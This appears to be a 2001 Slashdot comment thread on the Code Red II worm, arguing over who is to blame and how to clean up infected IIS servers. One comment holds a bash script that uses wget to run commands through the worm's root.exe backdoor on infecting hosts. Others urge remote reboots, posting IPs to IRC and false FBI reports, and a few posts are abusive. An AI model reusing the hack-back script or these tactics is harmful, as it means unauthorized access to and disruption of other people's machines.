Code Red: the Aftermath

LiquidPC writes: "Microsoft has released a tool to help clean up the effects of the Code Red II. It removes the files and mappings installed by the worm, and reboots your system; it also gives you an option to permanantly disable IIS." So, Microsoft has given you a mop to clean up the mess they made. Start mopping! If you're not the one infected, just tired of seeing your Apache logs fill up, you might see this page.

But that doesn't help if...

[Ungrounded+Lightning]

The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.

But the trojan modifications by the newer version of the worm are permanent, and will NOT be removed by rebooting and installing the patch. The patch just prevents reinfection by the original buffer overflow bug.

Look here for a tool to TRY to clean up the system.

But note that once the system has had the FIRST backdoor installed, that may have been used to install other backdoors, unknown to the author of the cleanout tool. And in infected machine is advertising its vulnerability to the entire net by the infection attempts it makes.

The only real solution is to reinstall the whole machine, and install the patch before going live on the net.

(And while you're at it - why not install Linux or a BSD instead, and switch to the Apache web server, which doesn't HAVE this problem.)

Re:But that doesn't help if...

[reverius]

Hrm. Apparently I'm not well-versed on Code Red II as opposed to the original. I thought it would be all fixed with a reboot, but I guess there's more to it. Wasn't the whole point of the Microsoft fix to fix the whole thing? I guess you're securityfocus.com link is unnecessary then.

As for people who "might as well install linux or BSD and apache instead": that's not really possible. There are tons of people who have IIS installed by accident, and have never heard of this "Eunuchs" thing. ;)

Re:Microsoft Assumes...

That's alright. Us Microsoft users love to reinstall Windows. It's the solution to just about every known Windows problem (according to Windows help desks everywhere!).

Re:Here's how open source would be better...

[cburley]

Fact: Free software (sometimes aka Open Source software) is typically released to the public after anyone in the world has had plenty of opportunity to examine the source code of that product, try it in beta installations, beat up on it, and openly and legally discuss its performance, security, usability, and other metrics.

Fact: the same things almost never hold true for proprietary software.

Fact: Free software does not "produce more secure software than the proprietary world" per se, though such a poorly-worded phrase is often used in place of the truth, which is that free software, compared to proprietary software, i.e. when comparing software distributed to end-users (as versus in-house use only), has a greater opportunity to reach high assurances of being secure when comparing categories of software in which security is important.

For example, compare your personal ability to vet the security model of qmail vs. any of Microsoft's mail-server offerings. "They" can assure you of MS's "security", just as "we" can assure you of qmail's. But, of the two, only qmail allows you to legally examine the source before ever having to enter into a contract allowing you to do so; to discuss findings with others, out in the open; to beat up on it in a test installation before committing to a purchase (and remember that such purchase is typically followed by a strong urge to justify said purchase, rather than prove it to have been an incorrect decision); and so on.

Fact: that "people with infected IIS are not admins" is irrelevant. Given MS's position in the marketplace, I suspect they could easily ensure that only true admins would be allowed to run IIS on the Internet. (After all, they use imposing legal language to bind "licensees" to contractual requirements designed to improve MS's bottom line and warm cuddly feelings of "protecting their IP", right?) At least, they could surely make it less likely that non-admins might "accidentally" deploy IIS on an Internet-exposed host. Why don't they do this? Because they prefer playing both ends against the middle, as most businesses do -- "anyone can buy and use our products" on the marketing end becomes, on the customer-service end, "you must be doing something wrong". (Yes, there are those who claim GNU/Linux is "ready for the desktop" and such like that. Why believe them? Why not investigate these claims for yourself? I claim that since everyone has the freedom to do that with free software, such claims have nowhere near the "guilt" for security breaches that a company like MS does when it makes similar claims about what, to most everyone else in the world, is a black box -- its proprietary software.)

Fact: While it is indeed not always true that people are paid to fix free software, the exact same thing is the case for proprietary software.

The difference is, if you're depending on a free-software product that isn't being maintained by someone for $$, you have the option of hiring someone to do the work.

Whereas, if Microsoft decides, as it surely will down the road, to stop paying its programmers to fix IIS, or Windows 2000, or DOS 5.whatever, you'll be out of options if you have failed to follow the M$-recommended upgrade path.

Fact: Red Hat does not, and has never, represented the security-conscious administrator's #1 choice for a default system installation of GNU/Linux.

Fact: If you find Red Hat's choice of configuration (which I think has been improving lately; I've been using it for years) unacceptable, you have many other choices for where to obtain distributions, versions, and configurations of the Linux kernel specifically, the GNU system generally, and other free-software systems as well.

Challenge: name three vendors from which you can obtain the Microsoft Windows 2000 or Windows NT kernel in a distribution as fundamentally different from Microsoft's as Debian's, or SuSE's, is from Red Hat's.

Okay, make it two vendors. Okay, make it one vendor other than Microsoft. I'd sure love to know if they license their kernel to other software-distributor outfits to wrap with their own chosen apps, using their own chosen configurations, etc.

(And note I haven't even mentioned OpenBSD yet!)

Fact: to preserve their advantage in IP investment and security, proprietary-software distributors have an incentive to create packages as large, complex, monolothic, and, therefore, difficult-to-reverse-engineer, as possible. Free-software authors, like any software author, tend to create large, complex, monolothic programs due to natural tendencies, but they don't have nearly the bottom-line incentive to do so. That is, as their expertise, their sensitivity to security and complexity issues, might lead them to producing simpler, cleaner, more "transparent" products like qmail, they won't be rebuffed in their attempts to go down that road by managers and lawyers saying "we can't make it that easy on our competitors to reverse-engineer our IP".

Consideration: most proprietary software, especially in wide (therefore profitable) circulation, especially the sort of software where Internet-exposed security is an issue, performs some kind of license-checking to prevent "piracy" ("unauthorized coveting of intellectual privilege" is IMO a better phrase), whereas hardly any free software does that sort of thing. Which choice poses a greater security risk to the overall system, in terms of things like resistance to viruses, worms, etc., degree of inviting reverse-engineering of obscured code, etc.?

Opinion, mine: in the end, proprietary software stands opposed to secure software, because for software to be secure, it has to be easy to publically validate as secure (i.e. be validated by any third party without contractual agreement, thus allowing that party to speak freely about security concerns), whereas, for that software to be usefully proprietary, it must be obscured, intentionally, by the distributor.

Observation: The current method of choice proprietary software vendors use to obscure the IP they release into the wild is to compile and link it down to machine code and cross their fingers. With non-programming forms, they have to resort to even less workable forms, such as encryption. ("Less workable" because compiling to machine code generally makes the end product run faster, and because today's dominant software-development paradigm is predicated on the need to be able to strip out source and other "redundant" code, whereas encrypting other forms of software tends to make them less immediately useful to the end user, who then needs a more sophisticated engine to reveal the purchased IP.)

That some vendors are increasingly resorting to the legal system, rather than on complexity alone, to keep their IP obscure, does not change my claims at all -- however the software is obscured, the very act of obscuring it defeats the goal of making it secure.

(Though, as with firearms, to the degree laws are used to prevent access to source code, access to source code becomes something much more closely associated with those contemplating lawbreaking, rather than those merely very interested in learning about, and gaining expertise in, the relevant technologies. "When source code is outlawed, only outlaws [and government] will have source code." Think about the security implications of that situation, and ask whether you wish to visit houses, office buildings, and skyscrapers whose blueprints are "secured" in the same fashion.)

Re:FUD ALERT

[dzeanah]

Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass. Service pack 2 for NT Server made it so my machine rebooted the 2nd time I accessed a device on the floppy controller. Streamer or floppy -- first access is fine, 2 seconds after the 2nd access I was looking at a black screen and the PC was doing a POST (read: no shutdown, just an immediate reboot). SP3 fixed it, and it wasn't there pre-service pack. When I worked at a major law firm in Atlanta, our DC office had a ton of hard-to-reproduce problems related to the BDC over there. Turns out the admin installed SP4 when it came out because he trusted MS releases. Uninstalled to SP3 and it was solid as a rock. Put SP5 on and it was still great. SP6 sucked, but 6a was just fine (except it broke the way some NT boxes routed, apparently). So maybe the rule is to avoid even-numbered service packs.

Re:Blame everyone bigger than you.!

[bogado]

It is partialy microsoft fault that their user base is the way it is. They have a history of hiding options and complexity of their products to make them "user-friendly".

Make a program that even an idiot will use it, then only a idiot will use it.

Re:You're dead wrong...

Microsoft [...] installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

Uhm, such as?

Code Red & Others As Advocacy Tool

[UberOogie]

Yes, it is sort of off-topic. No, I do not advocate anyone writing viruses. Go to town, moderators.

My point is this:
MS is now on the brink of a win so big that they will be nearly be unstoppable, possibly even by the government, once it happens.

This is, of course, .NET, which would give them a strangle-hold on ecommerce, and a hand in the pocket of nearly everyone on Passport.

MS, and even Passport, have had huge security and service blow-ups in the past (Hotmail outages, etc.), and it hasn't even been a blip on the radar as far as most average people are concerned. It hasn't even registered on a corporate level, outside of the IT departments, who are just being blamed by the executives for not taking "proper care" of their single-platform fiats.

Now, a high-profile virus that keeps going on and doesn't go away (like, for example, Code Red)and forces the public's attention on the issue and becomes a constant and increasing embarassment to MS as it continually claims to have fixed the problem just before a new version shows up.

Now, people have this in their heads, even if it is the wrong way. ("That evil Russian hacker wrote this awful virus that takes over my computer.") The point being, that even executives will start to notice it, and may take the time to read their half-page summary sheet on the problem that it only affects MS, especially their new products that they want everyone to upgrade to.

Ultimately, only a sustained, media-covered security crisis will have any sort of effect on MS. Public opinion will only be turned when the average user is affected by it. It will happen after .NET launches and the first hack happens that compromises personal data, but it won't matter unless it happens *before* then.

Just a thought.

Re:Code Red & Others As Advocacy Tool

[wadetemp]

Damn, man, don't you think MS knows that? Where open source has its righteous sensibilities Microsoft has vicious media sensibilities.

They KNOW if personal data gets compromised that they'll be in deep doodoo with the average user. I think they'll do almost anything to keep that particular feature secure... including not implementing it to the extent that the ".NET buzz" suggests it will be. Hailstorm is more hype than fact, especially from what I've seen working with the .NET beta components. It's just not there. It's not going to be anything more than Hotmail and MSN are now... because it's too much risk for MS to bear with their public.

Re:Stop blaming microsoft

[chris_sawtell]

It's not so much the creators of C itself. It's a very good language. It's the fault of the design of the subroutine / function call & return mechanism. If one thing comes out of Code Red etc. it is for both the compiler & hardware designers to understand the need separate the return addresses from the 'auto' data arrays & simple variables on the stack. Doing this would stop buffer overflow stack smashing attacks dead in their tracks. What a wonderful commercial opportunity. Stop the worms dead. Just fit this new CPU, $50 please. New O/S needed too, $500 please. New app. programs, $5000. Pay up before you press "start", or go to jail. Money for old rope. All that is needed is to install the new cpu, compiler, and C library on the development machines, and then type 'make'. Presto!

Somebody tell William Gates III, and Andy Groves how the're missing out on another umpteen Fort Knox fulls of money, ( and arrange a cent on each sale for me. :-) Might just rejuvinate the entire industry after the dot-bomb crash. If Bill actually does this, I will personally implore the Dept of Justice to stop hounding the world's latest Saint.

Actually: authors of strncat() MAN PAGE and gets()

[Ungrounded+Lightning]

Blame the bozo who designed strncat!

strncat() isn't a problem by itself. The problem is improper usage patterns.

When you're builiding a string by repeated strncat()s to a buffer, and you don't have guarantees about the size of the things you're concatinating, you need to prevent (or check for) overflow, something like this:

strncat(dest, src, MIN((BUFFSIZE-1)-sizeof(dest), chars_wanted_from_src));

Without such an example in the man page it's easy to forget to guard against buffer overflow. And once code is writing with guards for overflow the guard code will serve as a reminder to later programmers maintaining or upgrading the code.

But strncat() isn't the main culprit.

Most of the buffer overflow attacks come from reading an input using gets(). That bad boy should have had a buffer size argument, ala fgets(). And it's the decision to keep it in the standard library "for compatability" that causes all the pain.

The gnu compiler will warn you if you use it and the man page has a warning, so there's no excuse for it to show up in new code any more. And there's no excuse for not fixing ALL the warnings in a piece of production code, or for using (or writing) a compiler that DOESN'T warn about gets().)

Re:Stop blaming slashdot

Like this one, maybe?

Service Pack MAXINT, step by step

[leonbrooks]

For a straight A: fix the problem forever by replacing NT with Linux...

Shouldn't be too hard to alter one of the standard installers to:

• Download a minimalist CygWin kit
• Pull down a second-stage installer
• Shrink a partition, live (might have to defrag first)
• Add three new partitions in the shrinkage (swap, image, /var) using ReiserFS for the data partitions
• Download and write a base Linux installation image into the image partition
• Download and install suitable drivers for (e.g.) video card
• Set up Linux config of network interfaces, DNS, webserver, video, etc from Windows config
• Copy all active websites into /var/www
• If any actually use ASP, download, install and use ASP2PHP on them
• Make the service pack ingredients available via HTTP so that daughter sites can fetch from here istead of home base
• Break all passwords and copy them across to PAM (invent a new root password)
• Put the new root password on the default background wallpaper
• Reboot into Linux, auto-login as root, and restore DNS/web service
• Migrate all (in case something didn't translate) Windows data into /var/WASWINDOWS
• Set up a listener at default.ida to react to future CodeRed probes
• Go through the logs and process all attacking sites

What have I forgotten?

Re:What if

[Gordonjcp]

What, like BSD?
I like BSD but it's bloody hard work to get HTTP, FTP, SSH, SMTP and POP3 to all play nice with a clean install... Maybe I'm just not very good at sorting it all out.

Re:Not the mess they made...

[maxxon]

No kidding. Talk about egg on their faces. It's been known for months, there's no excuse for the damage being this bad.

Re:Not the mess they made...

[barnaby]

More M$ Fud..

I'ts not the OS, it's the incompetent Admin.

Re:Stop blaming microsoft

[Gordonjcp]

Technically, yes, but he invented the idea of a stored-program machine where data and code share the same memory space.
So, a Turing machine is *any* stored-program computer, a von Neumann machine is where program and data co-exist, and a Harvard machine is where program and data are entirely seperate.

You're dead wrong...

[dsfox]

...about this not being Microsoft's fault. 90% The machines running code red have no system administrators, because they are home machines whose owners have no idea they are even running a web server? Why? Because Microsoft, in its miniscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

Re:You're dead wrong...

[Tony-A]

IIS is NOT installed by default on Win2K Pro. Now how exactly does that protect NT Workstation, NT Server, W2K Server, Advanced Server or Datacenter Server from Code Red.

Re:You're dead wrong...

[mpe]

...about this not being Microsoft's fault. 90% The machines running code red have no system administrators, because they are home machines whose owners have no idea they are even running a web server? Why?

End user administration appears to be one of Microsoft's central ideas. It's portrayed as making things "easier" to use and as a cost saver to corporate users. (In the case of the latter it can also increase costs because any idiot end user can mess things up...)

Because Microsoft, in its miniscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

Even though the workstation version of 2000 apparently does not install IIS by default. Rarely will machines just be running Windows...

Re:You're dead wrong...

When you install Win2k IIS is NOT (once again... IS NOT) installed by default, and can be installed later by using Add/Remove Programs in the contol panel.

It's installed by default with W2K Server, Advanced Server and Datacenter Server. It's not installed by default with W2K Pro...you have to go into Add/Remove Programs to install the "Personal Web Server" which is a cut-down version of IIS.

I'm halfway through my MCSE and this is the behavior I have observed. And believe me, I have nuke/pave/reinstalled W2K more times than I can count.

Re:You're dead wrong...

[dsfox]

It is true that it is not installed by default with the operating system, that is not what I said. It is installed with other applications.

Re:You're dead wrong...

Ummm.... Have you ever run Win2k? I guessed not, as you have no clue about how it actually installs and simply repeat the crap you've heard here. When you install Win2k IIS is NOT (once again... IS NOT) installed by default, and can be installed later by using Add/Remove Programs in the contol panel. Next time you feel like posting please think for a second and make sure you actually have a clue what you are talking about.

Re:You're dead wrong...

please give me an example of one piece of software that installs IIS automatically....

Re:Stop blaming microsoft

[Meech]

Linux is written in C, and it doesn't have this problem?

Something to think about ...

Put the blame where it belongs

[CAIMLAS]

Everyone is saying, "blame MS", and "blame the virus writers," and/or "blame the trained monkeys." Everyone has it all wrong. All these people are responsible. MS is for having an OS that allows such exploits to be performed, and for telling people that it's easy and doesn't require skill to keep a server up and running (if you make it easy enough for a monkey to do something, monkeys will do it!). Second, the virus/worm writer, for writing it, and 3rd, the idiot monkeys for playing with something they don't have the skill to play with, and infecting each other. (Maybe like AIDs - people/monkeys play as they shouldn't, infecting each other... and everyone suffers for it.)

Re:If you've had a corporate hit on your network..

[nick-less]

Those machines have probably been patched since infection, but have not been cleaned. The patch does not dis-infect Code Red from the machine, a lot of web admins don't realise this

So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines dont bother us again.
The root.exe left in their scripts directory would be their own problem.

on the other hand, we could just broadcast the ip's to serval irc channels, and then look how long the keep up ;-)

What is everyone else doing?

[ekbond]

As a sysadmin for a couple of Linux web servers, I have been monitoring this site and others to see what everyone else is doing about CR. Up to now, I have gathered that the general feeling was one of moderation: ie., to try to notify the sysadmin of the offending site and wait until they patched or fixed their equipment.

Now, the feeling seems to be shifting. According to this message and its threads, scripting a reply to reboot the machine is accepted as a response. I am still not comfortable with this but I am willing to go along with the group.

What does everyone else feel about this?

Re:What is everyone else doing?

[J'raxis]

I wish there was a command to remotely turn a Windows machine into a smoldering pile of burnt plastic and silicon. But that's just how I feel.

Re:What is everyone else doing?

[SpaceLifeForm]

I wish there was a command to remotely turn a Windows machine into a smoldering pile of burnt plastic and silicon. But that's just how I feel.

Well, there is a logical equivalent.
Just call the FBI, tell them there is kiddie porn on the machine.

Re:Not the mess they made...

[dsfox]

What is the point of your message? Do you think
posting it enough will make such lazy sysadmins
go away?

Notification script

[Baloo+Ursidae]

Another idea would be create a script...

baloo@ursine:~$ cat redresponse.sh
#!/bin/bash

CR_FILE="/home/baloo/CodeRed.hit"

touch "$CR_FILE"

( cat "$CR_FILE"
grep default.ida /var/log/apache/access.log |\
cut -d " " -f 1 |\
sort | uniq
) | sort | uniq -u |\
while read IP
do
echo $IP >> "$CR_FILE"
wget --quiet -t 1 "http://$IP/scripts/root.exe?/c+start+http://ursin e.dyndns.org/~baloo/patch.html" &
done

What about Apache?

http://www.apache.org/info/20010519-hack.html they were compromised... didn't see no FUD on that one over here.... by the way, IIS usage is up >5% from june, Apache is down, check netcraft.com Some times this looks more and more like a FUD site than anything else, stick to the facts people and report ALL sides ok?

Re:What about Apache?

I dont know why you're such an ass to the point you didnt even read the article, we're talking about the same thing here, first of all, it was not the IIS deamon nor Apache that was exploited, it was Index Server and OpenSSH 2.2, same objectives, and that I know of, the MS patch was available before this whole mess came up, so I don't know about the waiting, furthermore if you did your homework you'd see there are ways to overcome the problem, if there was really a delay from microsoft providing the patch, I could just write a filter for IIS and thus patch the problem... and don't tell me you could just dive into the apache source to fix a problem because thats just plain bullshit!

Re:What about Apache?

[rmgrotkierii]

I have no idea why I am replying to an Anonymous Coward posting, but, here I am. This article is about the IIS daemon, and not the website! But how many times it's been reported that M$ OWN website has been hacked? Too many that I've lost count :). themes.org was also hacked. So what if the Apache website was hacked? Are you THAT dense not to tell the difference between a WEBSITE and a Web DAEMON? Grow a fscking brain before spreading FUD against Apache/*NIX. Yes Linux is just as hackable as Win*, but unlike Win*, you either can patch the system yourself or download the patches. For Win*, YOU have to WAIT for the offical patch! Oh goodness, it's a closed sourced system and I can't patch the OS myself.

Re:Stop blaming microsoft

Why don't you just admit it: You like cock.

Re:Blame everyone bigger than you.!

Oh please unix has just as many security problems.

OpenBSD is a little better, but it's mostly hype and a "l33"t image, not actually that much better in the real world.

Oh ya let's not forget the Morris worm...

You think there aren't tons of clueless Mandrake and Redhat users who don't patch shit? Of course there are and they get owned and used as a jump off for more hax0ring activity. Per Capita i bet linux and solaris boxes are more likely to go unpatched.

Oh and don't pretend FreeBSD is any better. If you look past the "l33t" image, it's just as crackable as anything else.

Re:I would like to have sex with a teenage girl.

cmdrtaco@slashdot.org

Re:Stop blaming microsoft

[blakestah]

The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

And were still vulnerable until we disabled URL forwarding.

The Microsoft patch alone is not useful. You are still at risk. See Incidents home page

I'm so sick of people blaming Microsoft. The released a patch well before Code Red. Get over it.

Microsoft STILL hasn't released a patch that makes their webserver secure and allows URL forwarding. Their patch has its own security hole !!

Blame Microsoft, or simply use Internet server software that is secure. All mine is written by Dan Bernstein :)

Automatically block IP under IIS?

[doublem]

My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.

While we're at it, can the net send command be used to inform the infected system of its "condition" without resorting to exploiting the Code Red II install of root.exe?

Anyone have any ideas for using Perl or ASP to do this?

Re:Automatically block IP under IIS?

[Mike+Hicks]

Well I have a PHP script that I've made, but I don't know if it works (I don't have any IIS boxes to test on).

If you want to test it, find an IIS box. Shut off the default route, so nobody can hit you while you're doing this. Copy cmd.exe to root.exe in the scripts folder. Open a browser on the IIS box, and point it at default.ida?XXXXX an Apache system running PHP and the script. If it works, it'll pop up a window on the IIS system.

When you're done, remove root.exe, restore your default route.

Re:Automatically block IP under IIS?

[Blrfl]

doublem writes:

My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.

My measly little class C's worth of addresses saw almost 11,000 Code Red attempts yesterday alone. Adding that many blocked hosts to IIS would most certainly bog it down to the point that nobody else would get in, either.

If your server isn't vulnerable, why bother? Just process the request and 404 'em.

If your server is vulnerable, consider getting it fixed instead of finding creative ways to create a denial-of-service attack on yourself. :-)

start from scratch is a great idea!

might I suggest saving lots work in the furture while you are at it?

Debian
or if you must have hand holding,
Red Hat

Re:Here's how open source would be better...

You can buy your nice 2001 Accord from Acura. Although Acura is a subsidiary of Honda, the two are run financially independantly of each other (think GM). The Acura TL lines up pretty closely with the Honda Accord. (I think they use the same frame/engine). Too bad you didnt choose a chevy or ford vehicle, I could guarantee you a different car with the same chassy/engine combination under a different brand name. Anyway. There's the answer to your challenge. now tell me where i can buy the NT kernel in a different environment, please. (This is not the original poster, just someone who has already moderated and doesnt want their moderation points wasted)

Re:Aftermath?

[meldroc]

It definitely isn't over - Code Red Vigilante still reports dozens of attempted Code Red II attacks. Hopefully, at least some of the decaffeinations get through and get people to patch their machines.

Port 80 may still be blocked by @Home, but I'm still getting attacks from other @Home customers. When are @Home's admins going to start cutting off the connections of infected machines? It's drastic, but it seems to be the only way to get the attention of some people.

Microsoft PR

[nontrivial]

Finally Microsoft is getting the right kind of PR! I can't wait to see how Microsoft gets out of this one unscathed.

Re:Microsoft PR

[BorgDrone]

Actually, it might even be good PR for them too.

this is what joe user will think:
A dangerous "virus" threatens the entire internet (*cough*) and then microsoft comes to the rescue with a patch and saves the internet!

Re:Microsoft PR

[SpaceLifeForm]

Actually, it might even be good PR for them too.

this is what joe user will think:
A dangerous "virus" threatens the entire internet (*cough*) and then microsoft comes to the rescue with a patch and saves the internet!

Which would be a good reason for M$ to leave the holes,
then release CR, wait for the PR, then release the patch when the PR starts to turn negative (Hotmail).
Repeat as needed.

Re:FUD ALERT

[LinuxHam]

Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass.

You deny Service Packs breaking the OS and then ask for an example of one "opening a hole". I don't have an example of a Service Pack that "opened a hole", but Service Pack 6 broke TCP/IP on NTWS and NT Server such that only users who were logged in with **admin** privileges could use TCP/IP. Imagine being 5,000 users into an automated 10,000 user upgrade when you find out that none of the regular employees can access their email anymore.

If you suggest putting the 10,000 users in the Domain Admin group to get around this, then you are as fucking stupid as you sound.

Re:setting this up?

[Mike+Hicks]

That's Slashdot's posting code trying to prevent really long strings from ending up in posts and screwing up the HTML table layout.

Re:The $64K question: Does it actually work?

[fava]

Have you ever read the EULA?

It basically says that Microsoft cannot be held responsible for anything, including the results of their own incompetence. Nor does it promise that the software will actually do anything useful. But if you try to steal it, it suddenly becomes extremely valuable and you are subject to prosecution to the full extent of the law.

EULAs are very one sided documents.

IIS. Windows next...

[LinuxMacWin]

and reboots your system; it also gives you an option to permanantly disable IIS.......

So all we need now is Code Blue which will result in us getting the option of disabling Windows...

Re:MS Tool

What has making changes to the web server daemon got to do with restarting the operating system?

Is IIS Yet Another Microsoft Program That Runs In Ring 0 ?

See also: Internet Explorer

Re:Stop blaming microsoft

[slushpupie]

There are many other options when using srings in C, you are not required to use a limited array of char.. in this day, if you are security concious, you should consider all the possibilities when writing a program.

strikeback fun, but not working very often...

[jqh1]

When I saw the strikeback script, I immediately installed in on my poor little beat up P166 running Linux/Apache -- hapless enough to be in my laundry room and the 24.x.x.x class A at the same time.

I was so excited, I modified the script to add a log file that showed whether a shutdown had occurred.

First thing I noticed is that the server shutdown really couldn't happen logically, since the first strikeback request would have shut down IIS, which would have to running to get the server shut down request. Easy workaround there...

Then I looked at the log and noticed the the shutdowns weren't occurring, so I tried a the strike back requests manually on a couple of the attackers. They generally refused my connection because there were 'too many users'. Is this MS personal web server, which maybe allows only one connected user at a time?

Anyway, many thanks to the folks who wrote that script! Made my vengeance-starved day!

Re:strikeback fun, but not working very often...

[RedX]

IIRC, any MS machine that is a non-server OS will only allow 10 network connections, so I'd think that the PWS servie would fall under this limitation.

Users share much of the blame

1) Exploit is discovered
2) MS releases a patch
3) CR1
4) Every news outlet screams about it for a week
5) CR2
6) Again, all over the news, but not qith the intensity of the first
7) CR3

With the release of CR1 and the widespread news coverage, it is hard to beleive that Sys Admins had not heard of this exploit by the time CR2 was released. I agree that MS takes some of the blame here, releasing software with a hole that they may or may not have been aware of on release. But, as soon as they released the patch and CR1 became huge news it became the responsibility of the system administrators to take action. With hundreds of thousands of computers still being infected it seems pretty clear that people just don't care.

When people hear about a defective toy from Burger King, they all go check to see if they have the toy in question and whether little Timmy is putting it in his mouth. They know the danger here and fear it, prompting them to take action. When they see the anchorman on the local news channel warning about some computer worm they don't see the danger to themselves in it. These things happen all the time and usually there is only a small percentage of people who are affected by the worm or virus. They are not aware of the danger, and all the "this is the big news event of the hour" hooplah in the media dulls them to the possibility that they may be affected.

We need to encourage those Sysadmins and users who do care to make an attempt to personally contact either the sysadmins at domains that are heavily infected and try to give personal warning that they have problems or we need some kind of counter-traditional-media that really puts the fear of Gord into them.

Or we need a really really nasty worm that exploits a fixable vulnerability and announces itself to the user once an hour, and if no action is taken within a reasonable time it does nasty, malicious things. If someone truly got bitten once, and saw for themself how computer security is really their responsibility, I think the number of trojans that Bob Goodnews-Badtoupee on the evening news has to read with his plastic grimace will drop significantly.

--Cheebus
One day I'll set up an account

Re:Users share much of the blame

[nmos]

" especially because the patch is HARDER to install in unix because it probably requires a recompile of the service."

Hmm, how is this hard? :

apt-get update; apt-get upgrade

Re:Users share much of the blame

[malfunct]

Someone needs to make worm like software to hit unix exploits to show that all software is vunerable to breaking.

Granted its open sourse so people will have a patch in 15 minutes but you will see the EXACT same problem as on windows where people don't install the patch, especially because the patch is HARDER to install in unix because it probably requires a recompile of the service.

Re:Users share much of the blame

It was done and it was called RAMEN. Same scenario, except set $IRRESPONSIBLE_BIG_SOFTWARE_COMPANY to Red Hat instead of Microsoft.

If you've had a corporate hit on your network...

[GC]

Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.

It basicly looks for Vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.

Nice to see someone has come up with a clean, pro-active method to kill this little menace off.

Re:Liability for software defects

[jeffy124]

Whose to say that MS couldn't hide a hole they discover in their product?

Re:Has anyone tried running this under Windows?

[john_uy]

I have installed this is W2K Advanced Server.

I tried it in IIS5. I redirected the default.ida from the root folder to the scripts page with the real default.ida.

I am not sure though if it really reboots the infected machines. But there is no error in the script. I am using Activestate's Perl program for IIS (PERLIS.DLL)

A little off topic, how do you know if the infected computer is version 1 or 2?

Also, earlier, the IIS service keeps on getting errors (tiemouts) is it due to the code red? After I patched the system, everything seemed well.

johnlaw

Re:I don't think this is funny...

[BorgDrone]

clicking on that link does NOT reboot your machine even if you are infected.
the reboot stuff only triggers when an infected machine tries to break into the machine running that script.

Re:Start blaming Microsoft again

[reflective+recursion]

So what you are saying is there is an alternative to Microsoft? One minute the hordes of Slashdot are ready to knock over Bill Gates' monopolistic empire, the next they are tearing it down with alternatives. Let us all rejoice in the coherence and nonhypocritcal nature of Slashdot readers.

Why blame _anyone_? Just jump ship man. Not like you are forced by gun to use their trashy software. You can only blame when it is a monopoly. Clearly you have alternatives.

Re:Here's how open source would be better...

[reflective+recursion]

What exactly does your (and other poster's) argument, or need, for a different vendor of the same product have to do with security? This is complete oranges and apples. You say "I could guarantee you a different car with the same chassy/engine combination under a different brand name." I can also guarantee you a Linux system with FAT32 support. That does not make Linux a Windows machine, now does it? There are certain distributions (tinyslack or whatever it is called) which use FAT (UMSDOS) for their primary partition. It is akin to using the same engine or chassie.

Where can you get the Linux kernel in FreeBSD? BeOS? NT? The kernel is not an interchangable part like an engine can be. Nor is the kernel always an open design.

No, getting an Accord from Acura does not make an Accord an Acura Accord. It is still a Honda. You can pick Accords up at any trade-in garage. I fail to see how this relates in anyway to security.

The reason to need an NT kernel from a different vendor is, well, none. I'm assuming you want an NT kernel for free (as in it costs you nothing). That is the only reason to bring this "argument" up. If the NT kernel was available from another vendor (proprietary), but cost the same as Microsoft you would both still be bitching. Freedom (GNU) is not about greed.

Not really the same thing

[eddy]

The point of the interlock is to form a dependence. Purpose: to ensure the survival of the worm in a hostile environment. Survival is of paramount imporance. Any kind of payload must come second.

The artificial society would take advantage of the fact that to cleanly kill it off the real-world enemy, us humans, would have to enter into correspondingly interconnected communication and trust

Payload is a whole other topic, where destruction of data is the least interesting one, though I agree that data-corruption is amongst the most evil payloads.

Re:Not really the same thing

[eddy]

Shit, you mean there's prior art?! :-)

(Yeah I remember, now that you mention it. It might be interesting to see how Windows would behave with two task monitoring each other in the same way. I'm not sure how it works behind the scenes with killing processes.)

Re:Not really the same thing

[blang]

From Eric Raymond's jargon file: !X id1
id1: Friar Tuck... I am under attack! Pray save me!
id1: Off (aborted)
id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men!
id1: Thank you, my good fellow!

Re:Stop blaming microsoft

So, Microsoft has given you a mop to clean up the mess they made.

That's at least as fair as saying that C is responsible. And let's not forget that sendmail was "responsible" for the RTM worm, and that the MPAA is "responsible" for DVD piracy.

If you believe all these assertions, go ahead and keep doing exactly what you feel like doing. Morals need never bother you because it will NEVER be your fault.

Re:Stop blaming microsoft

[Gordonjcp]

Blame Alan Turing, he invented stored-program computers...

Re:Some don't know they have IIS

[DeeKayWon]

I'd really like to know how this happens.

I'm on Win2K Pro right now, freshly installed last night. IIS is not running, because it isn't installed by default. You have to go to Add/Remove Programs and install it yourself. So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge? IIS is installed by default on the server varieties of Win2K, but these people shouldn't be running those. So I wonder, what's going on?

Here's a clue about "Linux worms"

[rickmoen]

Which system did Ramen infect?

It attacked the brainstems of morons who had left notoriously insecure network-daemon software running unpatched for a year or more. That's what we call being too stupid to live.

Rick Moen
rick@linuxmafia.com

Re:Unforgivable!

"And, no, my machine was not shut down"

Fuck, you are lucky for all these tax data would be lost forever...
That would be mega-fuck.

Re:Unforgivable!

Wrong, IIS (l)user...
An unpatched IIS server DOES mean your part of the problem...and you WILL be infected eventually, if you're not already. I've watched this worm, and it comes in 'under the radar'...so my guess is you're already infected, and just haven't figured it out yet.
So here's some advice...
PATCH YOUR FSCKING SERVER!!!

Re:Stop blaming microsoft

[bolverk]

umm... wasn't that Von Neumann?

